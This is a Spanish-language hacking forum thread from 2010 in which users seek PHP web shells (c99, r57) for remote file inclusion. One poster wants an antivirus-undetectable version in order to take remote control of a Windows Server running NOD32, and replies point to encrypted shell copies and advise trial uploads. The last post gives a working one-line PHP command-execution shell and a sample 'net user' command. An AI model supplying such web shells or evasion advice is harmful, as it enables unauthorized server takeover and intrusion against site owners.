Shell pho en imagen

Iniciado por wizache, 16 Febrero 2010, 21:17 PM

0 Miembros y 1 Visitante están viendo este tema.

wizache

Hola alguiens sabe donde puedo conseguir un shell de php para hacer rfi?
Saludos

WHK


Beginner_Hax0r

El paste de la c99 de ese link casi llega a las 6000 lineas de codigo ... y lo detectan 6 Antivirus, aun asi estaria bien pero ...

He provado a subirla a un ftp para ver si funcionava, pero no muestra nada, y si, el codigo PHP esta activado, da error por que dice que tiene demasiado codigo, se peta, y me propone detener el script ...

He buscado la c99, y despues de encontrarme con links rotos o borrados y encontrar un par de c99, todas me dan algun error, algunas son detectadas, otras se saltan algun antivirus ... prove a cifrar la original, pero luego tampoco me funciona, y ya no se que hacer ...

No pediria ayuda si no la necesitara ... Alguien tiene una c99 funcional e indetectable ?

PD: Gracias por el EditJPG, no conocia esa tecnica.

WHK

lo de la c99 indetectable sería raro porque no se usa en windows y un servidor en linux es raro verlo con antivirus funcionales porque la seguridad tiene otro enfoque.

http://foro.elhacker.net/nivel_web/c99_shellphp_cifrado_en_base_64-t169037.0.html
El link de rapidshare que sale en ese post todavía funciona.

Beginner_Hax0r

La c99 no funciona en Windows ??? [...] He visto videos de rooteo de windows con shell c99 subida a una web, y utilizaba codigos de cmd para activar un control remoto para entrar a el pc en cuestion ... por eso la busco indetectable, por que el windows que quiero si que tiene Antivirus, ademas el servidor es bueno y puede que la reconozca ... sino, que me recomiendas ? Es un Windows Server, el Antivirus creo que es NOD32, tengo acceso a la web como admin, no necesito RFI, puedo subir la shell y quiero acceso al PC donde esta alojada la web.

PD: El link que posteaste ya lo habia checado antes, lo detectan varios, aunque burla al nod32, no se si el servidor petara ...

http://scanner.novirusthanks.org/file/14bf5ffec57b5703b8332f5a9771e027/

(Copia no distribuida)

Darioxhcx

Cita de: Beginner_Hax0r en 18 Febrero 2010, 16:07 PM
La c99 no funciona en Windows ??? [...] He visto videos de rooteo de windows con shell c99 subida a una web, y utilizaba codigos de cmd para activar un control remoto para entrar a el pc en cuestion ... por eso la busco indetectable, por que el windows que quiero si que tiene Antivirus, ademas el servidor es bueno y puede que la reconozca ... sino, que me recomiendas ? Es un Windows Server, el Antivirus creo que es NOD32, tengo acceso a la web como admin, no necesito RFI, puedo subir la shell y quiero acceso al PC donde esta alojada la web.

PD: El link que posteaste ya lo habia checado antes, lo detectan varios, aunque burla al nod32, no se si el servidor petara ...

http://scanner.novirusthanks.org/file/14bf5ffec57b5703b8332f5a9771e027/

(Copia no distribuida)
la c99 no es la unica que sirve.. tenes la r57 u otras mismas...
busca shells en google hermano, en formato .txt y anda probando.. ademas no sabes si pudiste subir el php , o ya probaste de subir un php ?
capas que te dice , carga exitosa , pero no sube en realidad...

saludos

nacho87

Si lo único que buscas es ejecutar comandos usa ésto:

Código (php) [Seleccionar]
<?php echo passthru($_GET['cmd']); ?>

Con ...?cmd=net user....

Saludos!